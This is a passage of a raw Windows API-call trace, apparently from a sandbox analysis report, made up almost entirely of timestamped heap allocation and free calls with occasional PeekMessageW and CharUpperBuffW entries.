0x2aa9d48 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0088.376] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a90 | out: hHeap=0x2af0000) returned 1 [0088.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0088.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0088.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0088.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0088.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0088.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0088.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e08 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ef8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cd0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c40 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.381] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9da8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0088.381] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0088.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.382] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0088.382] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0088.382] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.382] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 